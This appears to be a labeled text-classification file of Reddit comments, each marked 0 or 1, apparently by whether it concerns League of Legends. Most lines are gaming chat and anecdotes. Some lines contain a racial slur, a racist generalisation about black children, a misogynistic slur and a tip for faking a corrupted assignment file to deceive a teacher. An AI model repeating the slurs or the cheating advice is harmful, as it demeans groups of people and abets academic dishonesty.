1	Had the exact opposite happen to me.   Played a game with a friend of mine. Won the game in 25 minutes or so. Enemy midlaner was incredibly salty and went out of his way to cuss at and accuse me and my friend of "being sad because we are tryharding" in post game chat. I didnt know about it since I dont use all chat, but appearently he had been whining throughout the whole game as well. Queued up again and this guy was on my team. He went on and on about some stupid shit concerning tryharding that didnt even remotely make sense. Guy was just horribly salty about getting smashed the previous game. Him and me were blueside lastpick. I hovered over Ezreal and waited for him to pick. He waited till the last second, then locked in Varus. Cosequently he went for AP Varus mid. Intentionaly fed out of his mind just to make us lose.   I say the fairest thing would be to first and foremost get you into a game with people you didnt play with last game, regardless of whether you honored them, reported them or didnt do either of the two. If there is none readily available then it's fine obviously. It's the only way to get a truely fresh game in that is not linked to the previous one.   I also wanna mention that I had multiple instances of people harassing me in 2 or 3 sucessive games in a row, regardless of win/loss/invidual performance, trying their damn hardest to be as difficult of a person as humanly possible. I'm not talking about verbal stuff here. I'm talking about actual, ingame griefing.
1	Not at all.  Assuming you build Philo first and have +5gp10 from rune/mastery, so 23gp10.   HoG cost 825g or 6min, pay for himself in 27m30s (most game are done before it).   Kindle Gem cost 850g, so you can build it 1.1s later than HoG.  Going Kindle>Shurelya cost you 550g, or 4min.  With HoG first (so 28gp10), completing Shurelya cost you 1400g or 8m20.   Going straight to Aegis cost you 1925g or 14min.  With Hog first (6min) you'll need 11m30s to build it, so 17m30 total.   Kindle>Aegis>Shurelya take 24min  HoG>Aegis>Shurelya take 26min   Just check how inefficient is HoG over a ruby crystal now :  350g for 20 health (negligible) and 5gp10.  You'll need 11m40 to make the upgrade worth it, 10min "only" is you count the 20 health (worth ~50g).  It was ~4m30 before the nerf.   Ho, and wards. 75g or 32s without HoG and 27s with. So each ward you buy before completing an item make the HoG path slightly better  by 5s .  So 24 wards (between the time you buy HoG and you complete Shurelya/Aegis) are enough to make the HoG path better (same time to build the items but you'll have the 200 health from the HoG).
0	What is wrong with you people?  Why so much hate on the guy for having a good wife?   Let's play opposite land... your husband gets laid off, and a year later you come home after yet another 60 hour work week (for which you packed your own lunches) - only to find that, as always, the house is a mess, there's nothing cooked or in the fridge, the kids haven't had dinner, a bath or done their homework, and you have nothing to wear tomorrow.   And it's ALL on you to correct, along with making your own dinner, lunches and dealing with the bills.   The only apparent thing he did all week was drop off the kids, and 6 hours later pick them up.  Probably played some video game or watched soap operas with the rest of his time.  Oh, and he also bought a new $120 fedora, and wants to know if you like it.   What's rolling through your mind right now?  Probably "fuck. that. guy."  Further, would you put up with the same from a friend?  Sibling?  Roommate?  Your own mother?   So why is it that if someone  does  take care of those things you guys make out like their SO is some kind of lazy dirtbag?  Would you consider yourself a lazy dirtbag if you didn't put up with the above?  Would you consider yourself some chauvinist pig, simply because he made you sandwich and ironed your work slacks?  Where exactly is the line?  Is it okay to assume that he does the cleaning, homework and dinner (for only the kids), but everything else is on you?  Even with that, there's still that 6 hours between dropoff and pickup (while you're working) that he doesn't appear to be doing anything - and yet when you get home, you both have equal housework to do.  Is that okay?   Or are there some things he should do for YOU (there's nothing left but "your" stuff) to fill in that time?
1	Yes, but I'm kinda worried about getting banned because I get reported as someone who is 'refusing to communicate', which is probably what would happen after a while. And if I leave the chat the way it is, I have to somehow participate in it at one point in the game. So, either way, bans are a 100% sure thing to get, no matter what. huehuehe   No, seriously now, I have made very good experiences with at least trying to lead by good example and make the players come down from their tilt/rage and tell them to stop worrying and flaming and that we still have a chance (obviously doesn't work if we get stomped hard for 20 minutes straight). If it wouldn't be so darn tiring to keep up with those kids I'd do it in every game.   Oh, and making calls if you are doing well is good too and most people will listen to you if you are the best player in the team of any given match. Also complimenting by saying gj or wp to people who make a comeback after they've died a few times can work wonders too.
0	Well that was less than a year ago so that is definitely a spoiler.
1	If you've played Dota 2 after playing LoL you feel like you're playing a completely different and  much  harder game. I'll be the first to admit that after playing LoL for 6 months+ I played my first game of Dota 2 and got stomped by bots while having  no  clue what I was doing. I didn't know how to deny I didn't really know how to prevent myself from being denied, I didn't know how the shop worked with courier and more than once I bought an expensive item outright and still had the mats for it in my inventory wasting a lot of gold. I got outplayed by a bot when I was ranged and he was melee (I was frost archer vs Tiny in midlane). There is a lot more going on with items in Dota 2 than LoL and the amount of choices was astounding to me. Dota 2 has a  lot  more depth. I wasn't getting beat by Tiny because I wasn't using spells correctly (frost archer has like 2 actives) I was getting beat because I couldn't handle my lane correctly. Dota 2 has buffs and they have little things like jungle pulling into lane and stuff that I couldn't do or handle. Dota 2 has a "hard" lane where you 1v2 and roaming is a lot more prevelent than LoL. The depth of the game is insane and if you don't know whats going on in team fight you're a very fast very easy kill.   LoL is 100x easier to pick up and 100x easier to play than Dota 2. I assume that Dota was as hard or harder than Dota 2. LoL isn't as deep because perfectly timed skill chains can be prevented/interrupted by your D/F key. 90% of level 30 games there's 10 flashes and those 10 "get out jail free" cards let you play like an idiot and get out of situations you shouldn't have let yourself get into in the first place. Just because Riven doesn't use mana and Shyvana builds rage after 6 doesn't mean they're deeper champions. In truth because they don't have mana they are easier champions to play and understand.
1	Formatted : ^^sorta   >I've been playing computer games since the first time my older brother taught me how to play starcraft.  I lived in an abusive home until I was 14.  Books and computer games like Starcraft, Diablo, and Warcraft were always my only escape.   >I moved to live in Vegas when I was 14.  My mom is my hero, she saved me from my father and stepmother and she got me into sports so I would develop some social skills and a better self-esteem.  Eventually LoL and working out became the only things that saved me from the brink of depression and self-loathing that was caused by my awful childhood.   >About a year and a half ago, I got in a bad car accident with a drunk driver.  I hit my head and got a bad concussion and my mind hasn't felt as sharp since.  My left wrist, elbow, and shoulder were messed up pretty bad from me trying to soften the impact.  My back was messed up as well.  As a result of this, I was unable to work out.(not sure if it's impacted my gaming abilities)  I lost almost all the strength in my upper and lower body.  Over about a year and a half, countless hours of physical therapy, a short painkiller addiction, and stomach problems from anti-inflammatory pills, I hadn't made much progress to recover.  I went from 195 pounds of mostly muscle to about 160 with a lot of fat that only made me look at myself worse.  On top of that, because the other driver was at fault, my health insurance refused to cover my medical bills.   >I spent all my savings and barely put a dent in my emergency room bills alone.  Without that money, I had to put off finishing college.  (I had been in college since I was 16.) Because of all this, I sunk into a pretty bad depression.  I would try to go running and my back would feel like it had a knife in it after less than a mile and I'd just get angrier.  I'd try to lift weights and wasn't able to even lift what used to be my warmup weight.  Since working out was no longer and option, League of Legends became my main source of distraction from myself.  I started playing more and more and getting better.   >I had watched Trick2G and other streamers for a while and thought how cool it would be to have people that enjoy watching me play this game that I love.  I finally decided to start streaming about a week ago.  I posted on Trick2G's stream that I was live when him, sirhcez, and fatefalls were all offline.  I had maybe 6 or 7 viewers when I did that.  And then about 20 minutes later, I looked at trick's stream to see if he was live, (i keep streams muted when I'm not watching them) and I saw myself on his stream.  In the comments I saw trick2g said "Yo ThorGodofBoom, hosting you now.  Good luck man."  And I turned into purplebeard for a few minutes "oh my gosh trick2g is hosting me!"  And then I had to start a game for my newfound hundreds of viewers.  I was running on like 2 hours of sleep and I didn't play so well, but I don't even care.  Trick and Sirhcez were chatting with each other on MY stream.  I was so nervous and I don't think I've ever been happier.  I told everyone I could think of at the time.  8 hours later, he was about to get on and I got off.  And I just cried because I was so happy.  I haven't had many good things happen to me lately.  And this was probably the best thing I could imagine right now.   >Trick2G didn't have to do this.  I didn't ask for it, or pay him to do it.  He just did it to be nice.  And the fact that he would do that makes me respect him more as a person than I already did.  I've seen him do streams where he takes all the money he got from subscribers and matched it to donate to charity.  I went from 6 followers on my channel to over 70 in one day and 100 views up to over 5k and now I can log in and a few people will start watching me play.  I don't know how many people will read this, but if you haven't seen his stream before, could you go on it right now and tell him he's the best?  If I could get 10 people to just do that, I think I'd feel like I've somehow repayed him for the nice thing he did for someone he doesn't even know.
1	Finding champions you enjoy playing within the meta isn't hard to do, and it shifts quite often. You'll probably find yourself winning more by following the meta too, it's the whole idea behind it after all.
1	The problem is, it's an easy thing to make a client-side replay dump. It doesn't double the load on the servers, barely makes a fractional increase in the load on the servers. That's why dota 2 servers are so stable with replays for every game ever (within the past 2 months or so for non-pro games, but available to download for your own use in those 2 months).   The problem is that riot doesn't care. There are plenty of models that other games use that can fix essentially every single problem they can claim to excuse their laziness, they just honestly don't care to follow the example of better people. They can't even claim that they want originality for their game, since they've taken every champ's ability from original dota, with the barest minimum of changes to make it not illegal, while rebranding as "an entirely different game."
0	I'm a lifeguard, and as politically incorrect as this is, I can't agree more. On my second day ever working as a lifeguard, three black kids (ages 4, 6, and 8) snuck into the pool I work at without anybody noticing. They were very obnoxious and wouldn't stop running (even after blowing the whistle multiple times at them and telling them to stop). It was clear that none of them could swim, which wasn't a huge problem since they stayed in the 3-foot section. Right before they finally decided they were going to leave, the 8-year old thought it would be a terrific idea to get all the kids he was playing with to watch him go off the diving board. And that's when I had to make my first save. Needless to say, whenever black kids get in the pool they are usually the center of attention for the lifeguards.
1	Nice read. We already had a lot calculations about HP vs Resistances, but a really nice
0	I'm not trying to outdo you but I have a much much embarrassing story.  I had to get braces as an adult (that's a different story altogether). Anyway, after about a week of having them on I was still in immense pain and since I have a lot of time to think at work (software developer at the time) I decided I could think about my code and listen to YouTube videos of people with similar pain.  I fired up the ole YouTube app and listened to teeenage girls complain about their braces and how they coped with the pain. The volume seemed to be low so I turned it all the way up and it still sounded muffled but I blamed it on the crappy headphone brand. After watching some videos about other people's braces pain I decided that it wasn't the worst thing in the world so I accepted the pain, took some of their remedies, and decided to browse around YouTube for a while. I continued to click on suggested YouTube links and ended up clicking through some of the popular videos at the time. I listened to that "hide yo kid" rap song, tourettes guy videos, that old comedian who died a while back who had the skit about 7 dirty words (note, these are probably bad examples about what was popular at the time but you get the point).  Well, I'm watching these videos for about an hour. A fucking hour! Now let me tell you that I worked in an open seating environment and there were at least 50 people within earshot of my phone. My friend was leaving for the day and taps me on my shoulder. I take my headphones off and said "what's up" and he pointed at the other end of my headphones. My headphones were unplugged and for an hour in a corporate office I was listening to the most ridiculous stuff on the internet and not 1 person told me that I was making an ass of myself. I immediately began to sweat but tried to act "calm, cool, and collected"
0	If I (or my offspring) broke something that belonged to them,  I would call and tell them, expecting them to ask for some type of reasonable replacement or reimbursement, which I would agree to.  If that person instead jumped straight to calling the cops, or going to small claims, I am now going to strive to make sure you get as little as possible.
0	If you know you've done nothing wrong, ask to see the officer's supervisor. Don't sign anything. You may wait an extra 15 minutes, but it will give both parties a chance to cool down. When the supervisor arrives, explain your situation and DON'T lie. You might get out of the ticket, or may only get one citation. It's always good to get a second opinion. In most cases the supervisor has much more experience, and may have a more reasonable viewpoint of the situation. Realistically, if you're polite, the worst thing that can happen is you get the ticket anyway.
0	What cookie says.   It makes me super sad though. I didn't lose my virginity until 20 days before I turned 19 (Note so I don't seem like OAG here - I only remember that because that date is also my first ex's birthday).   But, even with "good" education for sex ed there is still tons of misinformation because it doesn't want to upset parents by teaching kids how to be safe. What I remember from my high school is that anal has no chance of pregnancy, oral can't pass STDs, that only fully straight and fully gay are your sexualities, polyamorous/open relationships don't exist, only condoms and the pill will prevent pregnancy, ad infinitum bullshit.   My school at least mentioned to take the birth control pill every day, and someone I went to high school with called me sobbing one day because her period was one (1!) day late and she's like "You wanna be a midwife, you're from a family of nurses, you must know!" So I grill her for a bit and turns out she hasn't taken her pill in about four months... Aye. :(
1	meh, the girl is pretty nice but the cosplay is cheap. She doesnt even have the scar on the left eye, which is Katarinas signature feature. The top is poorly chosen and the belt under her neck is missing completely. Its practically just a chick with a red wig and a short leather jacket. But it says WIP, maybe she's improving it still.
1	Tbh, I was really suprised with lemondogs, let me tell you why   Their botlane was superior in the early game, and had proper team fights certainly not worse then koreans. I would say when they were like 2k gold ahead they lost presense cause their midlane pick didnt work out, If they had lets say banned ahri, and took another mid matchup a bit more even I would really wanna see where this game would have went. Malphite had really good ults. I didnt feel they really got outplayed or stomped, just midlane matchup obviously lost them the game.
1	Well I think if you want to REALLY improve your game focus one one single role and paly every champion that fits for it. I only play AP mid as long as my team is ok with it and I think that I learn new things everyday. The problem with roleswitching is that you don't have constant expierience. If I fuck up my 100-Kill-Combo in a game i will pick the same champ again and try to make it better the next 10 games.
0	First off, did your medicine work? If so, congratulations.   On another topic, I complete agree with you.  I was one whose mother convinced I would get over it and everyone has it (not to my level though).  I was in college with no health insurance and was completely reliant on her if I wanted to go to the doctor. After finally convincing her the doctor visits have me hope which got my spirits up than they had been in a year.  Having the option of all the various medicines gave me hope.  Sadly, on after another gave me unbearable side effects and didn't put even a miniature dent in my condition to the point the doctor apologized and said "sorry, there's nothing else we can try" and sent me on my way.  Out of options and ideas, I sadly started self medicating. Most definitely wasn't ideal but it made the mental issues bearable and I didn't over drug, just enough to make going to class's, exams, and other responsibilities until they completely went away a year and a half later and took myself off of them after that.   I hate that I self prescribed because it was illegal. But for me, I has that choice or possibly dropping out of college, work, my robotics club, ect or the worst which was a constant struggle, killing myself.   So I hope all is going well with you my friend.  I know it's hard, but attempt to find a root cause if possible (mine was not). Else, as hard it is to do, attempt to find someone or a group/organization to help out regular.  I was extremely depressed until I found people that required more help than me and helping them brought me joy.
0	You have the wrong image of what hell is. Feel free to correct me if I'm wrong, but you seem to have this image of hell as it is in Dante's inferno, as this place that sinners are cast into for eternal punishment, where demons execute horrible tortures on sinners who regret ever having gone against God's will.  That couldn't be further from the truth. Hell is eternal separation from God and that can only be maintained by a constant and deliberate choice to go the way you want to and god does not. CS Lewis said it best when he said  "There are only two kinds of people in the end: those who say to God, "Thy will be done," and those to whom God says, in the end, "Thy will be done." All that are in Hell, choose it. Without that self-choice there could be no Hell. No soul that seriously and constantly desires joy will ever miss it. Those who seek find. Those who knock it is opened.
1	The important part in looking into old meta-game is knowing that they weren't even as much of a meta as they were a flavor of the month. I've been playing since release and I can tell you it went down a little something like this.   First, people were awful at using mages because that required using skills, auto-attacking was just easier. It wasn't uncommon to see full 5 man team of all B.F. Sword item builds with not a single tank item. Once people found out how squishy teams like this actually were, AoE meta popped in. Characters with huge AoE ults were ridiculous (amumu, nunu, fiddlesticks, kennen) because they would demolish a team of squishies. This transferred into the horrible times of tank meta. Alistar Garren Mordekaiser Singed Pantheon teams were unbeatable. If they could survive the opposing teams huge AoE burst, they would win. Sunfire capes used to stack in damage, so it would be very common to see 7+ sunfires on a team, even worse that shaco would have the sunfires from his clone and his clone got a fresh guardian angel every time Hallucinate was popped whether or not the real shaco had his GA up. Riot took the nerf bad and beat tank items and characters until the structured meta that we see today started to form. CS started to be a big thing, because people were getting better at not dying and everyone needed a source of income because people weren't going 10/0/5 by 6:00.   At one time, junglers were looked at as being bad or a handicap for the team. Top or Bottom (yes, double top and solo bottom would happen) would get destroyed 2v1 because it was "kill kill kill" mentality.   The very first lane tactic that I remember was splitting the ranged. If your team didn't have 3 ranged (one in each lane) you guys were total noobs and were about to get stomped.   EDIT:
0	I called my female colleague a cunt about five times today...
1	This type of mindset only perpetuates this feeling of expectation that if a consumer (a lol player) is displeased with the product they need to make it know on every bug/update thread ever created.   Making software, and especially online video games, is a lot of tough work. Im sure that riot is working as fast as they can on the LOOOOONG list of complaints and "improvements" that are constantly bombarding reddit and their own league website.   This game is FREE. and they cant just outsource 100 new programmers and artists to accomodate you kids whining on reddit. Enjoy the amazing peice of software in front of you, and accept that a large majority of us could never phathom making something even remotely as good.
0	Whenever I've done this I've used MP3s or JPGs. I'm not sure where people got the idea, but it's always better to corrupt the actual .docx in a regular text editor because if the teacher has any clue what they are doing, they are going to open that "corrupted" .docx in notepad and look for xml references or other signature signs that an actual .docx would have, but not a .jpg or .mp3.
0	My current domicile is also far too big for WiFi to reach my bedroom as well, it sucks when you are practically the only one who uses it, but cannot use it properly due to the fact that the signal isn't very strong on that end of the house due to the access point being on the direct opposite side.
1	Counter-ganking is when the enemy ganks but you come in straight after to turn the tables around (hey look it's captain obvious)   For instance: Your Gragas is getting ganked mid lane by udyr and Cassiopia. Gank comes from the brush to the side and Gragas runs, then you come in from behind (cause you just stole their wraiths, doing there wolves mostly isn't worth it) as Nautilus and surprise them. Casio has most likely used some of her spells and is on cooldown and both may have taken some damage from Gragas. That's when you pull them off him and ult that shit. OK so Casio and Udyr not the best examples as they have very short cooldowns but you can still own them as long as Gragas can get his shit off.   I type a lot but as long as you are near the gank is question and can actually do something to help, you get your ass there and pat yourself on the back for a counter-gank well done.
1	APs don't scale as well into lategame because all of our items are so much cheaper now. The stats reflect this, and even when you do well and get money there's very little to spend it on that's worth more than 3K gold. To get much lategame scaling at all on a nuker you need to either get Deathcap+Zhonya's+DFG, or just play Veigar.   Furthermore, I don't see how it's possible for Riot to make itemizing any more "fresh and appealing" because when you play AP you're basically just stacking one number as high as possible, Your Ability Power. There aren't a whole bunch of ways to make this fun with the items unless you want a confusing array of actives to keep track of.   That being said, I find AP much more fun to play because you don't just Point-and-click to attack things. You have to order combos and aim skillshots. Doing this perfectly is a more satisfying experience than autoattacking/QQ-ing someone to death as Caitlyn or Gangplank if you ask me.   In terms of more and more bruisers going mid... Well AD Midalee is a bitch. Often I want to go back to the days of being against Orianna or Brand every single game, when the meta was predictable and could be intelligently countered instead of a hotchbotch of ADs and APs going mid. These are turbulent times.   However, if bruisers do so well in mid, why not just play them? I enjoy playing fun AD casters like Zed from time to time and it makes a nice change from fighting Orianna every other match like the end of S2. What Riot has done is destabilize the meta quite effectively and as such (in my experience) people are playing "All-Round" hybrid characters like Nidalee and Teemo just to make sure that all roles are fulfilled.   I'm sure the Meta will settle someday, and we'll all be comfortable again.
0	Reading all these comments make me glad I moved into a studio apartment.
1	Can't agree more with this. People seem to also forget that the Elo algorithm was designed for playing chess, which is completely different to league. League is a team game, so there is sometimes truth to the "my team sucked" attitude, where you might deserve a win, but you don't get it (or equally, when you sucked but got carried). In chess, you win or you lose based on your play and your opponent's play and that's that.   The other thing to consider is the tilting aspect of league. If you go on a loss streak, it can be really difficult to win games. In chess, you don't have that as much, considering how much slower the games are and also the fact that the only person you can blame for losing is yourself; if you concentrate and improve your game, you'll start winning again. That's not always the case with LoL, leading to some really nasty point losses in the Elo system.   Also, I agree entirely that the league system feels more rewarding when you win games, especially when you win promo games. I remember when I had to repeat one set of promo games 11 times, which felt rubbish, but when I finally won them, it was just amazing. They probably also helped out my MMR, so it didn't feel like I was just wasting time.   And yeah, once again, I have to agree that the league points system feels better than the Elo points system. You can really get an idea of how good you are based on your points/league/tier, how much you gain on average and how much you lose on average. Obviously point gains/losses are variable, but you can see when you're gaining more points on average or losing more points on average. With the Elo system, it's sometimes just impossible to understand why you're gaining or losing so much.   I think that most people who want the Elo system back just want to be able to see a "number," to accurately show how good they are (which, by the way, as stated earlier, Elo isn't particularly good for when playing LoL). If you're that bothered, then ask Rito to just give us an MMR-like number. There's no need to go back to Elo.   As for promos between tiers/divisions, I think they're fine. If you keep on losing your promos, it's probably your own fault. I mentioned my 11 promo loss streak earlier. It was frustrating, yes, but I also knew that 1. I was good enough to win them eventually and 2. I won most other promos first or second time round, so why did it matter that I had one set of promos that was taking longer to win?   BTW, FYI, just because I always see "ELO," it's not an acronym! "Elo" is the last name of the guy who developed the algorithm, so you should really write it "Elo" or even "elo" rather than "ELO."
0	Storytime! I met this girl at a small birthday party thing, we ended up singing random classic rock song duets. Meet up several times in the next few months, turns out music is pretty much the only common interest, so we just trade music a lot online. A couple of months later she gets engaged (o0), which is fine as neither of us ever brought up dating (though it did cross my mind a few times).   End of the story is her sister is a tri-lingual book nerd with a wit you could use for shaving. Oh, and her parents really like me so I've been invited to stay at their house for a family weekend later this month.
0	Shaming doesn't work in either case. "If you're fat, you're gonna die early" is as bad as "If you're fat, you're gonna stay lonely".   What works to make people lose weight is individual. Everybody has their own motivation to start. If you told me I should stop doing X because it's bad for my body I'd laugh in your face and tell you I'd rather have a short happy life than a long unhappy one. But then, I know what motivates me, so I'm fit anyway...
1	Reaction Time =/= Mechanics.  It is a factor of mechanics, but conflating the two is a mistake.  The worst mechanical player in the world could conceivably have the highest reaction time.
1	Really, you need to keep him from all-in. If you can bait out his E before an engage, your jungler has a small window of opportunity to hank him very effectively and he also loses a good chunk of damage due to his passive.   You either farm to late game with an AD that out scales him or poke/out sustain him.
1	They play her one game crush the enemy (probably cuz more skilled) and they think she's op and play her over and over cuz they get cocky and they think they can beat everyone.
0	Similar thing happened to me a couple months ago. I was serving what was supposed to be an eight top that had turned into a twelve top, so they didn't all fit around the table very well. I carried a full tray of various wine glasses and started placing them on the table. Each time I would lean in to place a glass I would say "excuse my reach" or "right behind you" because I had to lean kind of far to get to the table.   So I get about a quarter of the way around the table and as I'm placing a glass down this lady decides its a good time to stand up. She knocked over the rest of the glasses all over herself. She left to go change, and I was mortified because I have never spilt ANYTHING at a table before. The table assured me it was her fault, and left me a great tip, but I still felt awful.  I should be clear that she seamed pretty pissed when she left to go change, but everyone else kept telling me they saw it was her fault.
1	You are pretty much describing exactly the opposite of what kha'zix actually is.   Kha'zix is a late game champion. He struggles in the jungle early game and his ganks are mediocre until level 6/11.   Kha's late game is fantastic though, like it always should be. He is great at capitalizing on 1 mistake and just snowball the teamfight. And in just a standard 5v5, once his team blows 1 person up her will just reset and get in and out with ease.   His damage without isolation isn't good, but he should be going for isolating opponents anyways. If there is anything that needs buffed, it is his isolation range nerf reverted a bit, maybe by 25-50 range instead of the full amount.   His waveclear is one of the best of all junglers late game once he evolved w.   He CAN tank, because he has stealth, which the ability to just hit a button and poof disappear for a while, and then do it again, is still going to be very strong in teamfights.
1	First of all, stop comparing LoL pros to DotA 2 pros. Second there is more to watching streams than the raw skill of a player (at least YOUR opinion of their skill), you fucking nigger.
0	You need more upvotes.  I almost quit Reddit before I found out you could unsubscribe from /r/atheism because of how horrible it made me feel about myself. I never questioned my faith because I knew what I believed and that I had every right to believe it, but even while trying to sensor out the bad posts I would accidentally click on one that seemed harmless and end up crying because the comments and general message made me feel like less than scum. And the cause was always two-fold, first I would be upset because of how the stupid ignorant people calling themselves Christians would make a mockery of my right to believe in God, and second because of the cruelty the generalizations of /r/atheism made about Christians.  It made me feel like less than dirt and I spent a lot of time depressed and miserable about it.
1	Keep in mind that almost everything I'm talking about is directioned to competitive play/pro play   I think riot is taking the game in the wrong direction and it'll make the game very much boring after a while.   I don't care if every time reddit happens to be wrong in a few things and then some stupid fucker does a video called "lel reddit knows balance xDxD" that reddit upvotes because the biggest circle jerk is how reddit like to bash itself.   Every fucking time there's a nerf to an early game jungle, some people say the games is going towards "League of lategame" and they're right, but then a few guys come and say shit like "well, lee sin is way too dominant right now".   Yes, lee sin is way too dominant, I agree, but he wasn't, then riot nerfed pantheon, vi's base damage (buff in scaling), indirect nerfs to elise like the ancient golem path, nerfs to j4, nerfs to evelynn as an AP assassin, all that shit made lee sin way too strong. He was perfectly balanced a few months ago, but riot's balancing made it so that you have to play the few ones left for early game (like lee sin was) if you want to make an impact early in the game. And that's for jungle, don't even get me started on top lane and mid lane.   Fuck gragas, fuck maokai, fuck alistar, fuck all of that shit in top lane. They're braindead champions in top lane because all you gotta do is build one bruiser item (roa for mao/gragas, triforce for alistar) and build full tank, you'll have the damages, the tankyness. You're also stupidly hard to get out of the lane because of how tanky and how much sustain they have, fuck that. All of this made very hard to do an impact in top lane even if you're better than the enemy and an early game based top laner because they can just go back , teleport and lose 0 farm. You can't play renekton and hope to completely wreck the enemy who first picked a weak laner because he has teleport and teleport negates your lane pressure. You can't pick Rumble because you don't have sustain and enough damage early game to kill these fuckers, and you're eventually going to get outscaled not because of damage, but because of tankyness and because these champions completely take away your strenghts (mao ulti, displacement from gragas and ali).   Then there's mid laners, who are now basically a wave clear bot, all of them being mages. Every now and then there's some zed, some talon, a few yasuos. Of course every rule has it's exceptions, but mostly? Yeah, wave clear mages who'll try to strall the game for 20 more minutes in hopes the enemy do some dumb shit.   That also applies to AD carries, all I see in competitive play nowadays are tristana, kog maw and shit that at 40 minutes into the games becomes a fucking monster.   I get it, last season every game was decided before 20 minutes, but isn't that how this game is supposed to be? If some teams play it very well in the early game, they should be rewarded by having it easier to win the game.   End of rant. Sorry for bad grammar. Also
1	HSGG did an AMA ages where someone asked how much money is stream made, someone else replied saying he could probably make like $2,000 per day, HSGG replied that 2k in day would be absolute BEST case scenario. ie. streaming for 14+ hours with 12k+ viewers.   So
1	I agree that pick order is more important than  call order, but there still needs to be communication with the other members of the team. There's no reason to just instalock a role that someone had previously called without saying a word (from my experience this happens a lot). Lets say you can play one role amazingly and 2 roles decently, then if someone else who only plays your amazing role wanted it, why not just play a role you are decent in, no reason to bicker and most likely lose a game just because you dont want to give up that role, while clearly you have more options than the other person.
1	Of the possible changes I have seen, this is probably my least favorite. It gives every ad champ Cait's passive. It would make laners kill each other way too quickly as soon as they get one crit item. Bot lane would just revolve around getting the crit up and then harassing on the crit. Being able to guarantee double damage at will would shorten the amount of time laners get to farm. It would also make Cait even more absurdly strong in early lane (Cait is my main ADC and I think this would make her way too strong) because even with the 1 crit rune people take she can deal half of a targets hp every few minutes.
1	Ok, let me rephrase. Based on the fact that a human cannot control what they think, and the fact that the individual in question is human, we shall assume he cannot control how he thinks. Therefore we should praise him for working on how he behaves regardless of motivation, as this encourages positive behavior, rather than saying his motives suck, since this is more likely to lead to long term positive changes. Imagine you have a child who wants a sweet. You tell them that they can have the sweet if they do the washing up, so they wash up, then you tell them they can't have the sweet because they only did the washing up so they can have the sweet and that's not a good motive. If you give them the sweet they might well do the washing up again, perhaps without being asked. Sure they're doing it because they want sweets, but positive behavior is increasing. Over time they may well come to realize that doing things such as washing up tends to result in positive consequences and their behavior changes. Now return to the situation where we tell them they can't have it because their motivation was "wrong" are they going to improve behavior? Probably not, why should they when you've already demonstrated that it yields nothing. Whilst this is an idealized scenario it captures the basic issue that positive change requires motivation, based upon this fact we should praise the change and whilst considering that it was based upon the motivation of being allowed to continue professional play continue to note the change, encouraging positive community interaction rather than deciding the change is worthless because the motivation isn't based purely on morals.
0	Knowing tow truck drivers well, this is very likely to be true (OP's story). Even if it weren't, tow truck drivers like to fuck with people. There's a level of sadism that comes with the job, specifically in colder climates.   They dislike their job, the long hours (for overnight companies) are rough, they deal with pissed off/shitty individuals multiple times a day in person, and - most of all - anyone who gets paid big money to grab cars illegally parked during snow removals has to be a bit twisted. Morals are somewhat thrown out the window with tow companies; everyone acts like their a victim of a crime and no one is to blame but the driver of the vehicle because they are the ones to have parked incorrectly.
0	Please, allow me to inform you of a wonderful tool called KeePass. The program is free, and it will allow you to store all of your passwords in a secure fashion behind a master password. KeePass further enables you to create secure and random (pros read: pseudo-random) passwords for your Facebook, bank, Gmail, Tumblr, etc.   I am guessing that your OAG will not be able to easily remember that, "Dkljeru3hri23rb332rsdfkjwejr3" is your Facebook password and, "lkjk3439483i4j3b]][][]  ] [ ]3842uyo3uh" is the one for your Tumblr or whatever the kids are into these days.
0	The definitions of accidental discharge and negligent discharge are different within circles of those trained to handle firearms. As such, most "gun guys" who really know their stuff will say that any time a gun fires when you pull the trigger but you weren't expecting a shot, is a negligent discharge. Any time the gun unexpectedly fires and no one pulled the trigger, is an accidental discharge. Your definition of accident seems to include negligence but this is not the case in firearms training.
1	Happened to me too with Kennen last season. Was playing him top even before Maknoon did (who was the first to do it in competitive play - quickly followed by other top laners like Flame or Shy who crushed with Kennen). But you know what was even funnier? Riot didn't even care how the best top laners in the world (in korea) crushed with Kennen. When did they nerf him? TWO WEAKS after he was used in LCS...which was like 4 MONTHS after koreans started using it. That was just Riot saying "Well...we don't know what is going on! We just follow NA! NA the best! - oh right guys! dont forget to make S3 Worlds quarter finals Bo3s so upsets (western teams winning) is more likely!"   But i actually LIKE the rework of Gragas. (ok I am a top laner so maybe I am bias) But look at Kennen. You sure it would have "just been fine" to nerf his numbers? Well then he would have been completely useless then. Like how does a NERFED Gragas against Xerath, Ziggs, Ori etc...even worse then Ahri probably...where is she at? At least he can be played top lane. Champs like Kennen or Ahri "who just got their numbers nerved" aren't playable at all.
0	It has nothing to do with boobs and everything to do with people being overly PC pussies. It's not just the pictures, I've seen NSFW tag on DISCUSSION threads. If you need to be told when a topic may not be appropriate for work, you will probably do some dumb-fuck move to get yourself fired anyway.   The real problem is reddit catering to the politically correct, easily offended culture. I am so goddamn tired of hearing how offensive something is, or how offended a group of people are; get right the fuck over it and move on and keep your bullshit to yourself. Being offended doesn't entitle you to anything and you should be treated like a whiny child since you are acting like one.
0	I feel like your understanding of "greed" is a little off. Greed is not simply wanting something you don't have; it's wanting something that is unnecessary or in excess. For example, wanting enough money to provide for one's family, or wanting medical benefits so one won't be financially devastated in the case of an emergency, is not greed.   Think about your argument, and consider all the assumptions you are making about dissatisfied worker #1. Does he/she have enough free time to find another job? Can their family handle the possibility of having their breadwinner out of a job for the period of time where they are looking for a new job? Are alternative companies/corporations even available? (If they aren't available, is moving to a new area something that is financially or sociably viable?)   It's really easy to say, "well if they REALLY wanted it, they would just roll with the punches until they found a new job." However, I think reality for many people is much less black and white. Maybe a new job would require moving. Maybe moving isn't an option because the kids like their school/the wife or husband is established in their job/financially its just not possible/ a billion other (arguably) legitimate reasons.
1	curse have a lot of money, i'll put my money on him getting money and the reason he left was for money.
